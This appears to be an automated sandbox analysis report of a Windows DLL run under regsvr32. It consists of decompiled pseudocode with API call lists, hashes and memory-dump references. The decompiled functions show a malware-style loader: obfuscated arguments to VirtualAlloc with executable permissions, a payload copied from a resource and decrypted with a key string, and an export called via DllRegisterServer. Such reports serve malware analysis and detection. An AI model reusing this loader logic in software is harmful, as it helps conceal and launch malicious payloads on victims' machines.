                                                                                                                						_t241 =  *_t158(_v96, 0x18db, 0x10098b50, _t240, 0xe498a819, _t240, 0x38fc338c, _t240, 0x13eaa9b, _t240, 0x91bc62bf, _t240, 0x14b15953, _t240, 0x8d7cfac7, _t240, 0x16723a2f, _v84, 0x13c73337, _t240, 0xb279ad6e, _t240, 0xf3f7e5b8, _t240, 0x21fc0ac3, _t240, 0x1f34d42c, _t240, 0xe8b443c4, _t240, 0x4978d8bb, _t240, 0x1e0f72a8, _t240, 0x375fda65, _t157, 0x235d8184, _t157, 0x23b57d89, _t157, 0xc55813b, _t157, 0xafc6405d, _t157, 0x9559310e, _t157, 0x22f53faf, _t157, 0x21ad3fb3, _t42,  &_v28,  &_v80, __edi, __esi, __ebx);
                                                                                                                						_v100 = LoadResource(_v96, _t241);
                                                                                                                						_t122 = SizeofResource(_v96, _t241);
                                                                                                                						_t282 =  *0x100bc06c - _t220; // 0x74f44d2f
                                                                                                                						_v92 = _t122;
                                                                                                                						if(_t282 == 0) {
                                                                                                                							_t209 =  *0x100b8260; // 0x0
                                                                                                                							_t242 =  *0x100b825c; // 0x0
                                                                                                                							_t123 =  *0x100b8254; // 0x0
                                                                                                                							_t201 =  *0x100b8264; // 0x0
                                                                                                                							_t223 =  *0x100b8258; // 0x0
                                                                                                                							_t244 =  *0x100b825c; // 0x0
                                                                                                                							_t245 =  *0x100b8250; // 0x0
                                                                                                                							_t61 = _t201 + 0x2000; // -269181532
                                                                                                                							_t220 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                							_t124 = VirtualAlloc(0, _v92, ((_t201 * _t223 + _t244 * _t245 - _t209) * _t123 - _t201) *  *0x100b8258 + (_t123 - _t245 + 0x00000001) * _t209 -  *0x100b825c + _t61 | 0x00001000 + ((1 -  *0x100b8258) * _t201 - _t123 * _t123 -  *0x100b8250 + _t209) * 0x00000005, ((_t123 - _t242 * _t209) * _t123 - _t201 * _t209 - _t242 * _t223 + 1) * _t209 - _t201 - _t244 - _t123 + ((_t123 - _t242 * _t209) * _t123 - _t201 * _t209 - _t242 * _t223 + 1) * _t209 - _t201 - _t244 - _t123 + 0x40);
                                                                                                                						} else {
                                                                                                                							_t205 =  *0x100b825c; // 0x0
                                                                                                                							_t259 =  *0x100b8250; // 0x0
                                                                                                                							_t206 = _t205 * 3;
                                                                                                                							_t140 =  *0x100b8258; // 0x0
                                                                                                                							_t214 =  *0x100b8254; // 0x0
                                                                                                                							_v84 = _t140 * 3;
                                                                                                                							_v88 = _t206;
                                                                                                                							_t207 =  *0x100b8260; // 0x0
                                                                                                                							_t54 = _t207 + 3; // 0x3
                                                                                                                							_t124 =  *0x100bc06c(0xffffffff, 0, _v92, ((_v84 - _t214 * 0x00000003) *  *0x100b8264 + 0x00000009) *  *0x100b8250 + (_t214 * 0x00000003 - _v84 - 0x00000009) * _t207 - _v88 + 0x00001000 | (1 - _t214) * _t214 - _t54 *  *0x100b8264 + (0x00000800 -  *0x100b8258) * 0x00000002 -  *0x100b825c - _t207 + (1 - _t214) * _t214 - _t54 *  *0x100b8264 + (0x00000800 -  *0x100b8258) * 0x00000002 -  *0x100b825c - _t207, (_t259 * 3 - _t206) * _t214 - _t207 * 6 + 0x40, 0); // executed
                                                                                                                						}
                                                                                                                						_v88 = _t124;
                                                                                                                						memcpy(_t124, _v100, _v92);
                                                                                                                						_t126 = malloc(0x57c0);
                                                                                                                						_t204 =  *0x100b8250; // 0x0
                                                                                                                						_t210 =  *0x100b8254; // 0x0
                                                                                                                						_t179 =  *0x100b8254; // 0x0
                                                                                                                						_v84 = _t126;
                                                                                                                						_t127 =  *0x100b8258; // 0x0
                                                                                                                						_t212 =  *0x100b825c; // 0x0
                                                                                                                						_t208 =  *0x100b8264; // 0x0
                                                                                                                						_t183 =  *0x100b8260; // 0x0
                                                                                                                						_t256 =  *0x100b825c; // 0x0
                                                                                                                						_t258 =  *0x100b8260; // 0x0
                                                                                                                						L10001082();
                                                                                                                						L1000145B();
                                                                                                                						 *0x100bc094(_v84, _v84, _v88, _v92, (_t127 * 3 - _t208 + _t258 +  *0x100b8254 + _t204) * 3 + _v84, ((_t183 - _t208 - _t127 + 1) *  *0x100b8254 - _t256 + _t256 + _t208 + _t258 + _t204) * 4 + "ioJWT8ckiz9iT>_KLO0FiY95u@GjVFR*hl8<d3ewW+Da)gagIMNfn+<3?MyG&T4KLEuy^d?pfZ<7FMkEHD^sY>KINeVpH)kZ_cgUYXSt7c+$o3HN__lU?jXl", ((1 - _t204) * _t127 - _t210 * _t204 + _t212 *  *0x100b8260) * 3 + (_t179 * 3 - 3) * _t208 + 0x79);
                                                                                                                						_t138 = L100010D2(_v88, _v92);
                                                                                                                						 *0x100bc0bc = _t138;
                                                                                                                						 *0x100bc0b8(_v96);
                                                                                                                						_pop(_t219);
                                                                                                                						_t239 = 1;
                                                                                                                						_t156 = _t220;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1004763E(_t86, _t156, _v8 ^ _t274, _t208, _t219, _t239);
                                                                                                                			}
                                                                                                                0x10007f15
                                                                                                                0x10007f1a
                                                                                                                0x10007f25
                                                                                                                0x10007f2a
                                                                                                                0x10007f35
                                                                                                                0x10007f3a
                                                                                                                0x10007f45
                                                                                                                0x10007f4f
                                                                                                                0x10007f5a
                                                                                                                0x10007f65
                                                                                                                0x10007f6a
                                                                                                                0x10007f78
                                                                                                                0x10007f7d
                                                                                                                0x10007f88
                                                                                                                0x10007f8d
                                                                                                                0x10007f98
                                                                                                                0x10007f9d
                                                                                                                0x10007fa8
                                                                                                                0x10007fad
                                                                                                                0x10007fb8
                                                                                                                0x10007fbd
                                                                                                                0x10007fc8
                                                                                                                0x10007fcd
                                                                                                                0x10007fd8
                                                                                                                0x10007fdd
                                                                                                                0x10007fe8
                                                                                                                0x10007fed
                                                                                                                0x10007ffd
                                                                                                                0x10008002
                                                                                                                0x1000800d
                                                                                                                0x10008012
                                                                                                                0x1000801d
                                                                                                                0x10008022
                                                                                                                0x1000802d
                                                                                                                0x10008032
                                                                                                                0x1000803d
                                                                                                                0x10008042
                                                                                                                0x1000804d
                                                                                                                0x10008057
                                                                                                                0x1000805f
                                                                                                                0x10008065
                                                                                                                0x10008070
                                                                                                                0x10008075
                                                                                                                0x1000808a
                                                                                                                0x10008091
                                                                                                                0x100080a1
                                                                                                                0x100080a4
                                                                                                                0x100080aa
                                                                                                                0x100080b0
                                                                                                                0x100080b3
                                                                                                                0x10008165
                                                                                                                0x1000816b
                                                                                                                0x10008171
                                                                                                                0x1000817f
                                                                                                                0x1000818f
                                                                                                                0x1000819a
                                                                                                                0x100081b6
                                                                                                                0x100081e8
                                                                                                                0x10008210
                                                                                                                0x10008210
                                                                                                                0x10008213
                                                                                                                0x100080b9
                                                                                                                0x100080b9
                                                                                                                0x100080bf
                                                                                                                0x100080c5
                                                                                                                0x100080c8
                                                                                                                0x100080d0
                                                                                                                0x100080de
                                                                                                                0x100080e1
                                                                                                                0x100080e4
                                                                                                                0x10008127
                                                                                                                0x1000815a
                                                                                                                0x1000815a
                                                                                                                0x1000821c
                                                                                                                0x10008223
                                                                                                                0x1000822e
                                                                                                                0x10008234
                                                                                                                0x1000823a
                                                                                                                0x10008240
                                                                                                                0x1000824f
                                                                                                                0x10008252
                                                                                                                0x1000825e
                                                                                                                0x10008270
                                                                                                                0x10008280
                                                                                                                0x10008296
                                                                                                                0x100082a2
                                                                                                                0x100082c7
                                                                                                                0x100082d5
                                                                                                                0x100082dd
                                                                                                                0x100082e9
                                                                                                                0x100082f7
                                                                                                                0x100082fc
                                                                                                                0x10008302
                                                                                                                0x10008303
                                                                                                                0x10008304
                                                                                                                0x00000000
                                                                                                                0x10008304
                                                                                                                0x10007dfb
                                                                                                                0x10008322

                                                                                                                APIs
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 10008097
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 100080A4
                                                                                                                • VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,?,-00000040,00000000), ref: 1000815A
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,-100B625C,?), ref: 10008213
                                                                                                                • memcpy.MSVCRT ref: 10008223
                                                                                                                • malloc.MSVCRT ref: 1000822E
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 100082DD
                                                                                                                • _printf.LIBCMT ref: 1000830F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocResourceVirtual$??3@LoadNumaSizeof_printfmallocmemcpy
                                                                                                                • String ID: .$.$.$2$3$c$e$e$k$mvr.$n$n$r$r$t$t$v
                                                                                                                • API String ID: 414098479-1080197306
                                                                                                                • Opcode ID: 64407883eec9e5d4b3ebde0447c007c1a9bde779a78371be9fd4498219856d1d
                                                                                                                • Instruction ID: 8a749b35a92ac8894742e7b36e387fd2e7c82a0fcd8bab04e5032650b4ed148f
                                                                                                                • Opcode Fuzzy Hash: 64407883eec9e5d4b3ebde0447c007c1a9bde779a78371be9fd4498219856d1d
                                                                                                                • Instruction Fuzzy Hash: 6AE15C7A9103289FEB04DFF9CDC59C9BBB9FF98340B01562AE404AB275E7B05A04CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10020650() {
                                                                                                                				struct _CRITICAL_SECTION* _v4;
                                                                                                                				char _v28;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v56;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr __ecx;
                                                                                                                				signed int __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct _CRITICAL_SECTION* _t39;
                                                                                                                				intOrPtr _t40;
                                                                                                                				void* _t41;
                                                                                                                				long _t44;
                                                                                                                				void* _t45;
                                                                                                                				signed int* _t51;
                                                                                                                				intOrPtr _t64;
                                                                                                                				long _t68;
                                                                                                                				void* _t69;
                                                                                                                				void* _t70;
                                                                                                                				signed int _t72;
                                                                                                                				intOrPtr _t78;
                                                                                                                				signed int _t82;
                                                                                                                				void* _t86;
                                                                                                                				signed int _t88;
                                                                                                                				void* _t90;
                                                                                                                				void* _t91;
                                                                                                                				void* _t93;
                                                                                                                
                                                                                                                				_push(_t72);
                                                                                                                				_push(_t69);
                                                                                                                				_push(_t88);
                                                                                                                				_t86 = _t72;
                                                                                                                				_t1 = _t86 + 0x1c; // 0x100bdc5c
                                                                                                                				_t39 = _t1;
                                                                                                                				_v4 = _t39;
                                                                                                                				EnterCriticalSection(_t39);
                                                                                                                				_t3 = _t86 + 4; // 0x20
                                                                                                                				_t40 =  *_t3;
                                                                                                                				_t4 = _t86 + 8; // 0x3
                                                                                                                				_t82 =  *_t4;
                                                                                                                				if(_t82 >= _t40) {
                                                                                                                					L7:
                                                                                                                					_t82 = 1;
                                                                                                                					__eflags = _t40 - 1;
                                                                                                                					if(_t40 <= 1) {
                                                                                                                						L12:
                                                                                                                						_t21 = _t40 + 0x20; // 0x40
                                                                                                                						_t88 = _t21;
                                                                                                                						_t22 = _t86 + 0x10; // 0x4f0cb0
                                                                                                                						_t41 =  *_t22;
                                                                                                                						__eflags = _t41;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							_t69 = GlobalHandle(_t41);
                                                                                                                							GlobalUnlock(_t69);
                                                                                                                							_t44 = L10001311(_t72, __eflags, _t88, 8);
                                                                                                                							_t72 = 0x2002;
                                                                                                                							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                                						} else {
                                                                                                                							_t68 = L10001311(_t72, __eflags, _t88, 8);
                                                                                                                							_pop(_t72);
                                                                                                                							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                                						}
                                                                                                                						__eflags = _t45;
                                                                                                                						if(_t45 != 0) {
                                                                                                                							_t70 = GlobalLock(_t45);
                                                                                                                							_t25 = _t86 + 4; // 0x20
                                                                                                                							__eflags = _t88 -  *_t25 << 3;
                                                                                                                							E10049170(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                                                                                							 *(_t86 + 4) = _t88;
                                                                                                                							 *(_t86 + 0x10) = _t70;
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							_t23 = _t86 + 0x10; // 0x4f0cb0
                                                                                                                							_t86 =  *_t23;
                                                                                                                							__eflags = _t86;
                                                                                                                							if(_t86 != 0) {
                                                                                                                								GlobalLock(GlobalHandle(_t86));
                                                                                                                							}
                                                                                                                							LeaveCriticalSection(_v4);
                                                                                                                							_push(_t88);
                                                                                                                							_t90 = _t93;
                                                                                                                							_push(_t72);
                                                                                                                							_v28 = 0x100b84e8;
                                                                                                                							L10048E48( &_v28, 0x100afe38);
                                                                                                                							asm("int3");
                                                                                                                							_push(_t90);
                                                                                                                							_t91 = _t93;
                                                                                                                							_push(_t72);
                                                                                                                							_v36 = 0x100b8580;
                                                                                                                							L10048E48( &_v36, 0x100afeec);
                                                                                                                							asm("int3");
                                                                                                                							_push(_t91);
                                                                                                                							_push(_t72);
                                                                                                                							_v44 = 0x100b8618;
                                                                                                                							L10048E48( &_v44, 0x100aff30);
                                                                                                                							asm("int3");
                                                                                                                							_push(4);
                                                                                                                							E1004764D(0x1008dd26, _t69, _t82, _t86);
                                                                                                                							_t78 = E10020454(0x104);
                                                                                                                							_v56 = _t78;
                                                                                                                							_t64 = 0;
                                                                                                                							_v44 = 0;
                                                                                                                							if(_t78 != 0) {
                                                                                                                								_t64 = E1001DB72(_t78);
                                                                                                                							}
                                                                                                                							return E10047725(_t64);
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t18 = _t86 + 0x10; // 0x4f0cb0
                                                                                                                						_t72 =  *_t18 + 8;
                                                                                                                						__eflags = _t72;
                                                                                                                						while(1) {
                                                                                                                							__eflags =  *_t72 & 0x00000001;
                                                                                                                							if(( *_t72 & 0x00000001) == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t82 = _t82 + 1;
                                                                                                                							_t72 = _t72 + 8;
                                                                                                                							__eflags = _t82 - _t40;
                                                                                                                							if(_t82 < _t40) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t82 - _t40;
                                                                                                                						if(_t82 < _t40) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t13 = __esi + 0x10; // 0x4f0cb0
                                                                                                                					__ecx =  *_t13;
                                                                                                                					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                                                                                					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                                                                                						L20:
                                                                                                                						_t30 = _t86 + 0xc; // 0x3
                                                                                                                						__eflags = _t82 -  *_t30;
                                                                                                                						if(_t82 >=  *_t30) {
                                                                                                                							_t31 = _t82 + 1; // 0x4
                                                                                                                							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                                                                                						}
                                                                                                                						_t33 = _t86 + 0x10; // 0x4f0cb0
                                                                                                                						_t51 =  *_t33 + _t82 * 8;
                                                                                                                						 *_t51 =  *_t51 | 0x00000001;
                                                                                                                						__eflags =  *_t51;
                                                                                                                						_t37 = _t82 + 1; // 0x4
                                                                                                                						 *(_t86 + 8) = _t37;
                                                                                                                						LeaveCriticalSection(_v4);
                                                                                                                						return _t82;
                                                                                                                					} else {
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
































                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(100BDC5C,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 1002065F
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 100206B5
                                                                                                                • GlobalHandle.KERNEL32(004F0CB0), ref: 100206BE
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 100206C7
                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100206DE
                                                                                                                • GlobalHandle.KERNEL32(004F0CB0), ref: 100206F0
                                                                                                                • GlobalLock.KERNEL32 ref: 100206F7
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100BDC40,10020AB5,00000004,1001E311,1000A083,1001E37A,1000CC6B,00000000,1000CCF1,00000001), ref: 10020701
                                                                                                                • GlobalLock.KERNEL32 ref: 1002070D
                                                                                                                • _memset.LIBCMT ref: 10020726
                                                                                                                • LeaveCriticalSection.KERNEL32(?,00000058,10006BB6), ref: 10020752
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 496899490-0
                                                                                                                • Opcode ID: b857802efc874081f982264080accc1c82b585f1a2281ce4d6776140f7bff196
                                                                                                                • Instruction ID: af271aca2a9668a8b962bf0fefcffd69e55be94dc5def31f8c145bf6bfeea780
                                                                                                                • Opcode Fuzzy Hash: b857802efc874081f982264080accc1c82b585f1a2281ce4d6776140f7bff196
                                                                                                                • Instruction Fuzzy Hash: 5A31BA756043059FE324CF34DD8CA9AB7EAFB85240B114A6EF993C3662EB70F8448B10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E100470E9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t10;
                                                                                                                				intOrPtr _t13;
                                                                                                                				intOrPtr _t23;
                                                                                                                				void* _t25;
                                                                                                                
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x100b59b0);
                                                                                                                				_t8 = E100491EC(__ebx, __edi, __esi);
                                                                                                                				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                				if(_t23 == 0) {
                                                                                                                					L9:
                                                                                                                					return E10049231(_t8);
                                                                                                                				}
                                                                                                                				if( *0x100bff64 != 3) {
                                                                                                                					_push(_t23);
                                                                                                                					L7:
                                                                                                                					_t8 = HeapFree( *0x100be104, 0, ??); // executed
                                                                                                                					_t31 = _t8;
                                                                                                                					if(_t8 == 0) {
                                                                                                                						_t10 = E10049097(_t31);
                                                                                                                						 *_t10 = E1004905C(GetLastError());
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				E1004ED25(4);
                                                                                                                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                				_t13 = L1004EE41(_t23);
                                                                                                                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                				if(_t13 != 0) {
                                                                                                                					_push(_t23);
                                                                                                                					_push(_t13);
                                                                                                                					L1004EE6C();
                                                                                                                				}
                                                                                                                				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                				_t8 = E1004713F();
                                                                                                                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 10047107
                                                                                                                  • Part of subcall function 1004ED25: __mtinitlocknum.LIBCMT ref: 1004ED39
                                                                                                                  • Part of subcall function 1004ED25: __amsg_exit.LIBCMT ref: 1004ED45
                                                                                                                  • Part of subcall function 1004ED25: EnterCriticalSection.KERNEL32(00000001,00000001,?,10051765,0000000D,100B5E08,00000008,10051857,00000001,?,?,00000001,?,?,10048D8A,00000001), ref: 1004ED4D
                                                                                                                • ___sbh_find_block.LIBCMT ref: 10047112
                                                                                                                • ___sbh_free_block.LIBCMT ref: 10047121
                                                                                                                • HeapFree.KERNEL32(00000000,?,100B59B0), ref: 10047151
                                                                                                                • GetLastError.KERNEL32(?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10047162
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714421763-0
                                                                                                                • Opcode ID: 17a2d7f9483df9dd83aed79f50096d5afd04269e0c4dac3921156a1520c90f98
                                                                                                                • Instruction ID: eb16438e638307e8988ba5fffe0d66e953f3cb3c88f18f150f3232e091455397
                                                                                                                • Opcode Fuzzy Hash: 17a2d7f9483df9dd83aed79f50096d5afd04269e0c4dac3921156a1520c90f98
                                                                                                                • Instruction Fuzzy Hash: E9018639905356AAEF24DB758D4AB8E3BA4EF01361F300178F508E60A1CB39A940DA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 121 10006a92-10006a99 122 10006aa2-10006aae call 100014bf 121->122 123 10006a9b-10006a9c ExitProcess 121->123 126 10006ab1-10006ab3 122->126
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10006A92() {
                                                                                                                				int _t1;
                                                                                                                
                                                                                                                				_t1 =  *0x100bc0bc; // 0x4e1938
                                                                                                                				if(_t1 == 0) {
                                                                                                                					ExitProcess(_t1);
                                                                                                                				}
                                                                                                                				_push("DllRegisterServer");
                                                                                                                				_push(_t1);
                                                                                                                				 *((intOrPtr*)(E100014BF()))(); // executed
                                                                                                                				return 0;
                                                                                                                			}





                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: DllRegisterServer
                                                                                                                • API String ID: 621844428-1663957109
                                                                                                                • Opcode ID: f164a2c1df02b106beb2bdf30efbd0ca68b12a10d6cf658a2290ad30241125c9
                                                                                                                • Instruction ID: 33a68f159489793551b4bbe44fd859da3e52daeb7b6bced8c0b969fc6bae3dde
                                                                                                                • Opcode Fuzzy Hash: f164a2c1df02b106beb2bdf30efbd0ca68b12a10d6cf658a2290ad30241125c9
                                                                                                                • Instruction Fuzzy Hash: 5EC08CB23083009AFA00EBB28C88E86328EDB00280318880AF600D2114EF3AE9004611
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 127 10003a82-10003b15 malloc 128 10003bc2-10003bc7 127->128 129 10003b1b-10003bbc 127->129 130 10003bdb-10003d1a 128->130 129->128 129->129 131 10003d20-10003d32 ??3@YAXPAX@Z 130->131 132 10003bc9-10003bd5 130->132 132->130
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E10003A82() {
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                				void* _t60;
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t71;
                                                                                                                				void* _t72;
                                                                                                                				signed int _t78;
                                                                                                                				signed int _t96;
                                                                                                                				signed int _t97;
                                                                                                                				signed int _t100;
                                                                                                                				void* _t105;
                                                                                                                				signed int _t115;
                                                                                                                				void* _t116;
                                                                                                                				signed int _t126;
                                                                                                                				signed int _t140;
                                                                                                                				void* _t142;
                                                                                                                				signed int _t152;
                                                                                                                				signed int _t154;
                                                                                                                				signed int _t168;
                                                                                                                				signed int _t171;
                                                                                                                				signed int _t208;
                                                                                                                				signed int _t209;
                                                                                                                				signed int _t218;
                                                                                                                				signed int _t219;
                                                                                                                				signed int _t220;
                                                                                                                				intOrPtr _t227;
                                                                                                                				void* _t228;
                                                                                                                
                                                                                                                				_t152 =  *0x100b8264; // 0x0
                                                                                                                				_t54 =  *0x100b8254; // 0x0
                                                                                                                				_t171 =  *0x100b8260; // 0x0
                                                                                                                				_t218 =  *0x100b8258; // 0x0
                                                                                                                				_t208 =  *0x100b8250; // 0x0
                                                                                                                				_t55 = _t54 * _t208;
                                                                                                                				_t126 = 0;
                                                                                                                				_t2 = _t55 + 1; // 0x1
                                                                                                                				 *(_t228 + 0x1c) = 0;
                                                                                                                				_t60 = malloc(((_t152 * _t152 + _t2) * _t218 + (_t171 - _t152 * _t54 - _t218 - _t208 + 1) * _t171 + 0x1d40) * 3);
                                                                                                                				_t209 =  *0x100b8258; // 0x0
                                                                                                                				_t219 =  *0x100b8260; // 0x0
                                                                                                                				 *(_t228 + 0x20) = _t60;
                                                                                                                				_t154 =  *0x100b8264; // 0x0
                                                                                                                				_t227 =  *((intOrPtr*)(_t228 + 0x24));
                                                                                                                				if((0x1d40 - _t219) * 3 - (_t154 * _t209 + 1) *  *0x100b825c - _t154 > 0) {
                                                                                                                					do {
                                                                                                                						_t105 = 0xfffffffc;
                                                                                                                						 *(((_t105 - _t219) *  *0x100b825c - (_t154 * _t219 + 2) *  *0x100b8250 + _t219 + (_t209 -  *0x100b8254) * 2) * 3 + _t126 + _t227) = _t126;
                                                                                                                						_t168 =  *0x100b8258; // 0x0
                                                                                                                						_t220 =  *0x100b8264; // 0x0
                                                                                                                						_t115 =  *0x100b8260; // 0x0
                                                                                                                						_t116 = 3;
                                                                                                                						 *((char*)(((_t116 - _t168) *  *0x100b8254 + (_t115 * _t168 - _t220) * _t115 + _t220) * 3 +  *(_t228 + 0x1c) + _t126)) =  *((intOrPtr*)(_t126 %  *(_t228 + 0x2c) +  *((intOrPtr*)(_t228 + 0x28))));
                                                                                                                						_t154 =  *0x100b8264; // 0x0
                                                                                                                						_t209 =  *0x100b8258; // 0x0
                                                                                                                						_t219 =  *0x100b8260; // 0x0
                                                                                                                						_t126 = _t126 + 1;
                                                                                                                					} while (_t126 < (0x1d40 - _t219) * 3 - (_t154 * _t209 + 1) *  *0x100b825c - _t154);
                                                                                                                				}
                                                                                                                				 *(_t228 + 0x14) =  *(_t228 + 0x14) & 0x00000000;
                                                                                                                				while(1) {
                                                                                                                					_t65 =  *0x100b8254; // 0x0
                                                                                                                					asm("cdq");
                                                                                                                					_t71 =  *0x100b8250; // 0x0
                                                                                                                					_t140 =  *0x100b825c; // 0x0
